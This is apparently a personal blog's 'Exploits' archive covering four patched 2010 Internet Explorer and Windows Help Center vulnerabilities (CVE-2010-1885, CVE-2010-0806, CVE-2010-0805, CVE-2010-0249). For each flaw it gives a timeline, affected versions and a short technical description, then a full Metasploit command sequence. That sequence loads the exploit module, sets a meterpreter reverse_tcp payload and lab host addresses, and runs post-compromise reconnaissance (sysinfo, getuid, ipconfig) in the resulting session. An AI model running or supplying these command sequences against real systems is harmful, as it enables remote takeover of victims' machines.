Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS10-042 : Microsoft Windows Help Center XSS and Command Execution

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-06-10
Metasploit PoC provided by natron the 2010-06-10
Microsoft patch “KB2229593” provided the 2010-07-13

PoC provided by :

Tavis Ormandy
natron

Reference(s) :

CVE-2010-1885
MS10-042

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 8

Description :

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”.

Commands :

use windows/browser/ms10_042_helpctr_xss_cmd­_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Timeline :

Microsoft MSA981374 advisory release the 2010-03-09
Exploit-DB PoC provided by Trancer the 2010-03-10
Metasploit PoC provided by duck the 2010-03-10
Microsoft patch “KB980182” provided the 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182” provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.

Commands :

use windows/browser/ms10_018_ie_tabular_acti­vex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-002 : Internet Explorer Aurora Memory Corruption

Timeline :

Vulnerability learned by Microsoft the 2010-01-13
Metasploit PoC provided by hdm the 2010-01-15
Exploit-DB PoC provided by Ahmed Obied the 2010-01-17
Microsoft patch “KB978207” provided the 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig